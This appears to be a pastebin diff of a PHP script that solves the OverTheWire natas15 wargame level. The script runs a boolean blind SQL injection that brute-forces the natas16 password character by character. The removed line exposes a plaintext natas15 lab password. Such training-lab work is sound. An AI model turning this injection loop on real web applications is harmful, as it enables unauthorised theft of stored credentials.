SHOW:
|
|
- or go back to the newest paste.
1 | <?php | |
2 | ||
3 | $url = "http://natas15.natas.labs.overthewire.org/?debug&username=natas16%22+AND+password+LIKE+BINARY+%22%_PWD_%"; | |
4 | $alphabet = array_merge(range('a', 'z'), range('A', 'Z'), range(0, 9)); | |
5 | $opt = array( | |
6 | CURLOPT_RETURNTRANSFER => true, | |
7 | - | CURLOPT_USERPWD => "natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J", |
7 | + | CURLOPT_USERPWD => "natas15:<censored>", |
8 | CURLAUTH_ANY => true, | |
9 | ); | |
10 | ||
11 | echo "============ INIT BREAKFORCE ATTEMPT =============<br />"; | |
12 | echo "BASE URL: ".$url."<br />"; | |
13 | echo "ALPHABET: ".implode(", ", $alphabet)."<br />"; | |
14 | ||
15 | $pwdchars = array(); | |
16 | ||
17 | $ch = curl_init(); | |
18 | foreach ($alphabet as $char) { | |
19 | $opt[CURLOPT_URL] = str_replace("_PWD_", $char, $url); | |
20 | curl_setopt_array($ch, $opt); | |
21 | $response = curl_exec($ch); | |
22 | if (strpos($response, "exists") !== false) { | |
23 | $pwdchars []= $char; | |
24 | } | |
25 | }; | |
26 | echo "=====================================<br />"; | |
27 | echo "CHARS FOUND: " . implode(", ", $pwdchars); | |
28 | ||
29 | $pass = ""; | |
30 | $url = "http://natas15.natas.labs.overthewire.org/?debug&username=natas16%22+AND+password+LIKE+BINARY+%22_PWD_%"; | |
31 | file_put_contents('php://stdout', '$pwdchars = '.print_r(implode(", ", $pwdchars), TRUE).PHP_EOL); | |
32 | while (strlen($pass) != 32) { | |
33 | foreach ($pwdchars as $char) { | |
34 | $attempt = $pass . $char; | |
35 | $opt[CURLOPT_URL] = str_replace("_PWD_", $attempt, $url); | |
36 | curl_setopt_array($ch, $opt); | |
37 | $response = curl_exec($ch); | |
38 | if (strpos($response, "exists") !== false) { | |
39 | $pass .= $char; | |
40 | file_put_contents('php://stdout', '$pass = '.print_r($pass, TRUE).PHP_EOL); | |
41 | } | |
42 | } | |
43 | } |